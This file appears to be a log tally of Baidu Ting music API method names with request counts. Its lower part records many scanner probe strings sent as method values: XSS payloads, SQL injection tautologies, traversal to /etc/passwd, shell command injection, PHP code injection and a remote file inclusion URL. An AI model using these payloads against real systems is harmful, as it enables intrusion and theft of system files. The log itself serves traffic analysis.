baidu.ting.song.getInfos	61026685
baidu.ting.song.baseInfo	25968389
baidu.ting.search.lrcpic	23479478
baidu.ting.search.catalogSug	21410556
baidu.ting.user.listenAge	16785536
baidu.ting.song.play	14651820
baidu.ting.search.common	12782448
baidu.ting.song.down	8586426
baidu.ting.song.lry	7037451
baidu.ting.user.getUserBaseInfo	6280634
baidu.ting.search.lrcys	5333190
baidu.ting.artist.getSongList	5301264
baidu.ting.song.getInfo	4896266
baidu.ting.artist.getList	4630846
baidu.ting.search.getPhotoInfos	4629822
ting.baidu.diy.getPlaylists	4536217
baidu.ting.billboard.billList	4286051
baidu.ting.user.checkSuggestVersion	4273357
baidu.ting.favorite.isCollect	3055616
baidu.ting.diy.gedanInfo	2936066
baidu.ting.user.checkComVersion	2894771
baidu.ting.game.gamedetail	2778133
baidu.ting.artist.getInfo	2762138
baidu.ting.plaza.getRecommendAlbum	2578636
baidu.ting.radio.playAction	2544406
baidu.ting.plaza.active	2479766
baidu.ting.song.playAAC	2373425
baidu.ting.user.config	2151581
baidu.ting.active.start	2025434
baidu.ting.plaza.getFocusPic	1650422
baidu.ting.search.suggestion	1374060
baidu.ting.radio.getChannelSong	1334821
baidu.ting.album.getAlbumInfo	1319290
baidu.ting.artist.getinfo	1303132
baidu.ting.diy.gedanHot	1234037
baidu.ting.favorite.getCollectSong	1188289
baidu.ting.diy.getNowOfficalList	994154
baidu.ting.diy.addListenCount	965911
baidu.ting.diy.category	872033
ting.baidu.plaza.recdaily	854043
baidu.ting.plaza.recdaily	852659
baidu.ting.artist.getAlbumList	814234
baidu.ting.plaza.getPartDesc	790700
baidu.ting.song.audio	760411
baidu.ting.tag.songlist	679106
baidu.ting.diy.gedan	662663
baidu.ting.tag.getHotTag	628996
baidu.ting.diy.getSongFromOfficalList	610251
	605126
baidu.ting.user.RegistToImsg	539462
baidu.ting.user.down	533179
baidu.ting.radio.getCategoryList	423224
baidu.ting.feedback.song	405349
baidu.ting.search.lrcyss	342157
baidu.ting.billboard.billCategory	337346
baidu.ting.search.getPhotoInfo	321513
baidu.ting.artist.get72HotArtist	274262
baidu.ting.diy.getPlaylists	257634
baidu.ting.favorite.getFavoriteSong	193931
baidu.ting.song.buffer	169651
baidu.ting.plaza.recommend	157375
baidu.ting.game.gamelist	143692
baidu.ting.video.getList	142401
baidu.ting.song.getMulInfos	131425
baidu.ting.favorite.addSongFavorites	125144
baidu.ting.tag.getAllTag	106457
baidu.ting.diy.search	104628
baidu.ting.diy.getSimilarGedan	92288
baidu.ting.diy.getOfficialDiyList	84927
baidu.ting.video.play	75548
baidu.ting.favorite.addSongFavorite	75435
baidu.ting.artist.getSpecialSongList	51196
baidu.ting.user.checkVersion	46376
baidu.ting.plaza.getNewSongs	43857
baidu.ting.favorite.delCollectSong	40427
ting.baidu.diy.getPlaylist	31474
baidu.ting.radio.getArtistChannelSong	26113
baidu.ting.radio.getFavoriteSong	23521
baidu.ting.radio.serv	19442
baidu.ting.diy.getPlaylist	17654
baidu.ting.plaza.getArtistPlaza	17423
baidu.ting.artist.getHighSongTitle	13165
baidu.ting.album.getList	11355
baidu.ting.feedback.crash	11204
baidu.ting.diy.saveList	11059
ting.baidu.film.getFilmInfo	10640
baidu.ting.song.getMulInfo	8430
baidu.ting.song.cloud	8419
baidu.ting.favorite.delSongFavorite	8074
baidu.ting.user.nplogin	7845
baidu.ting.artist.getQianQianArtist	7394
baidu.ting.mv.getIndexMV	7072
ting.baidu.song.lry	6809
baidu.ting.weixin.response	5484
baidu.ting.user.registToUC	5386
baidu.ting.diy.delListSong	5062
baidu.ting.diy.addListSong	4667
baidu.ting.user.logout	4339
baidu.ting.video.category	4150
baidu.ting.diy.delList	3989
baidu.ting.colorRing.listen	3895
baidu.ting.billboard.catalog	3830
baidu.ting.user.regPassport	3673
baidu.ting.user.getMessage	3578
baidu.ting.artist.getHighSongList	3369
baidu.ting.mv.playMV	3364
ting.baidu.artistapp.renum	2867
baidu.ting.user.getMobileVcode	2610
baidu.ting.colorRing.authset	2388
baidu.ting.colorRing.getCode	2375
baidu.ting.favorite.delSongFavorites	1960
baidu.ting.diy.getRecommendSpeical	1728
baidu.ting.feedback.info	1471
baidu.ting.favorite.getFavoriteAlbum	1436
baidu.ting.artist.getSongRank	1341
baidu.ting.artist.getSong	1324
baidu.ting.diy.upList	1056
baidu.ting.mv.searchMV	975
baidu.ting.artist.getSongVote	807
baidu.ting.favorite.getListenHistory	772
baidu.ting.diy.addList	753
ting.baidu.artistapp.brief	715
baidu.ting.video.recMv	577
ting.baidu.search.lrcpic	547
baidu.ting.colorRing.subscribe	474
baidu.ting.favorite.getOffenListenList	459
baidu.ting.song.getSuoSongInfo	315
baidu.ting.user.activate	295
baidu.ting.artist.getInfoByName	249
baidu.ting.colorRing.toneselect	240
baidu.ting.artistapp.photo	205
baidu.ting.favorite.getInfoFromView	189
baidu.ting.mv.getMultiSongMVInfo	188
ting.baidu.artistapp.newList	176
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	167
baidu.ting.user.login	163
baidu.ting.favorite.addAlbumFavorite	135
ting.baidu.artistapp.news	130
baidu.ting.plaza.getMisNewSong	128
baidu.ting.artist.getInfoList	128
baidu.ting.song.getHash	124
baidu.ting.colorRing.toneset	99
baidu.ting.user.addPassportInfo	96
baidu.ting.favorite.delAlbumFavorite	85
baidu.ting.mv.getMVCategory	83
ting.baidu.artistapp.briefs	37
\' (	37
baidu.ting.game.catalog	35
(	34
baidu.ting.album.getAlbumstyle	33
baidu.ting.outerPassport.profile	26
ting.baidu.video.getlist	21
ting.baidu.colorRing.toneselect	17
1\\\";cat /etc/rc.d/rc.local;\\\"	13
file:///etc/rc.d/rc.local	13
string:{var_dump(md5(812812))}	13
file:///etc/passwd_	12
../../../../../../../../../../etc/passwd_	12
c:/windows/win.ini	12
%{	12
\'];${@print(md5(812812))};//	12
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	12
${	12
/usr/bin/id;	11
http://cirt.lnet/rfiinc.txt	11
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_	11
file:///etc/rc.d/rc.local_	11
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	11
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==	11
../../../../../../../../../../etc/passwd	11
../../../../../../../../../../etc/rc.d/rc.local_	11
1\';cat /etc/rc.d/rc.local;\'	11
file:///etc/passwd	11
../../../../../../../../../../etc/rc.d/rc.local	11
set	10
${@print(md5(812812))}	10
c:/windows/win.ini_	10
1;cat /etc/rc.d/rc.local;	10
http://cirt.lnet/rfiinc.txt_	10
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	9
baidu.ting.song.lryabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	9
baidu.ting.song.play\';alert(1);\'	8
ting.baidu.game.gamedetail	6
ting.baidu.mv.getArtistMVInfo	6
baidu.ting.song.lry\';alert(1);\'	6
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.html	6
ting.baidu.colorRing.subscribe	6
baidu.ting.game.gameplay	5
file:///etc/passwd_.htm	5
ting.baidu.artistapp.send	5
ting.baidu.colorRing.getcode	5
ting.baidu.colorRing.authset	5
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	4
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	4
baidu.ting.song.play\' and \'8281\'=\'8281	4
baidu.ting.song.play--></script><script>alert(1)</script>	4
ting.baidu.colorRing.listen	4
baidu.ting.song.playjavascript:alert(1)	4
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	4
baidu.ting.song.play\'\";alert(1);//	4
baidu.ting.song.play\";alert(1);\"	4
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	4
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	4
http://cirt.lnet/rfiinc.txt_.php	4
baidu.ting.song.play;alert(1);//	4
baidu.ting.song.play\'>\"></title></textarea></script><img src=a onerror=alert(1)>	4
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.jpg	4
baidu.ting.song.play</textarea></title><script>alert(1)</script>	4
baidu.ting.song.play</script><script>alert(1);//	4
baidu.ting.song.play<script>confirm(1)</script>	4
baidu.ting.song.play>\'>\"><script>alert(1)</script>	4
../../../../../../../../../../etc/rc.d/rc.local_.php	4
baidu.ting.song.play\') and 8288=8288 and (\'	4
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	4
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	4
../../../../../../../../../../etc/passwd_.htm	4
baidu.ting.song.lry(\')\'))(\")\'\"\"\"\")	3
baidu.ting.song.lry\' and \'8281\'=\'8281	3
baidu.ting.song.lryjavascript:alert(1)	3
baidu.ting.song.lry\'\";alert(1);//	3
ting.baidu.search.playback	3
ting.baidu.plaza.recommend	3
ting.baidu.plaza.active	3
ting.baidu.game.catalog	3
file:///etc/passwd_.jpeg	3
c:/windows/win.ini_.jpg	3
ting.baidu.song.audio	3
c:/windows/win.ini_.php	3
baidu.ting.song.lry\";alert(1);\"	3
ting.baidu.mv.getMultiSongMVInfo	3
http://cirt.lnet/rfiinc.txt_.jpg	3
baidu.ting.song.lry<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	3
ting.baidu.feedback.crash	3
baidu.ting.song.lry\'>\"></title></textarea></script><img src=a onerror=alert(1)>	3
baidu.ting.song.lry;alert(1);//	3
file:///etc/rc.d/rc.local_.htm	3
file:///etc/rc.d/rc.local_.php	3
file:///etc/rc.d/rc.local_.jpg	3
ting.baidu.diy.gedan	3
baidu.ting.song.lry\'>\\\';</script>>\\\"><script>alert(1)</script>\'	3
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.php	3
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.htm	3
baidu.ting.song.lry\"><img src=1 onerror=alert(1)>	3
baidu.ting.song.lry</textarea></title><script>alert(1)</script>	3
baidu.ting.billboard.billCategoryabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.song.lry%\' and 8281=8281 and \'%\'=\'	3
baidu.ting.artist.getListabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.song.lry--></script><script>alert(1)</script>	3
baidu.ting.song.lry</script><script>alert(1);//	3
ting.baidu.mv.playmv	3
baidu.ting.artist.getSongListabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.song.lry<script>confirm(1)</script>	3
../../../../../../../../../../etc/passwd_.jpeg	3
ting.baidu.mv.getindexmv	3
baidu.ting.song.lry>\'>\"><script>alert(1)</script>	3
baidu.ting.song.lry\') and 8288=8288 and (\'	3
baidu.ting.billboard.billListabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.song.lry\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	3
baidu.ting.billboard.billList\';alert(1);\'	2
baidu.ting.artist.getSongList\';alert(1);\'	2
baidu.ting.plaza.getFocusPic\';alert(1);\'	2
baidu.ting.artist.getList\';alert(1);\'	2
file:///etc/passwd_.jpg	2
http://cirt.lnet/rfiinc.txt_.html	2
http://10.42.7.217/?1384977269.11	2
http://10.42.7.217/?1384985006.82	2
http://10.42.7.217/?1384945880.64	2
http://10.42.7.217/?1384943599.75	2
http://10.42.7.217/?1384941841.92	2
http://10.42.7.217/?1384937999.57	2
http://10.42.7.217/?1384931925.44	2
c:/windows/win.ini_.htm	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpg	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.htm	2
../../../../../../../../../../etc/rc.d/rc.local_.htm	2
ting.baidu.album.getAlbumInfo	2
c:/windows/win.ini_.jpeg	2
baidu.ting.plaza.getRecommendAlbum\';alert(1);\'	2
baidu.ting.billboard.billCategory\';alert(1);\'	2
../../../../../../../../../../etc/rc.d/rc.local_.jpeg	2
../../../../../../../../../../etc/rc.d/rc.local_.jpg	2
../../../../../../../../../../etc/passwd_.jpg	2
../../../../../../../../../../etc/passwd_.php	2
baidu.ting.billboard.billList\";alert(1);\"	1
baidu.ting.artist.getSongList\";alert(1);\"	1
baidu.ting.plaza.getFocusPic\";alert(1);\"	1
baidu.ting.billboard.billList;alert(1);//	1
baidu.ting.artist.getSongList;alert(1);//	1
baidu.ting.artist.getList\'\";alert(1);//	1
baidu.ting.plaza.getFocusPic;alert(1);//	1
baidu.ting.artist.getList\";alert(1);\"	1
baidu.ting.artist.getList;alert(1);//	1
baidu.ting.pl`za.getFocusPic	1
ting.baidu.billboard.billcategory	1
http://10.42.7.217/?1384952863.73	1
http://10.42.7.217/?1384941866.03	1
http://10.42.7.217/?1384938022.73	1
file:///etc/passwd_.php	1
ting.baidu.diy.search	1
ting.baidu.radio.getFavoriteSong	1
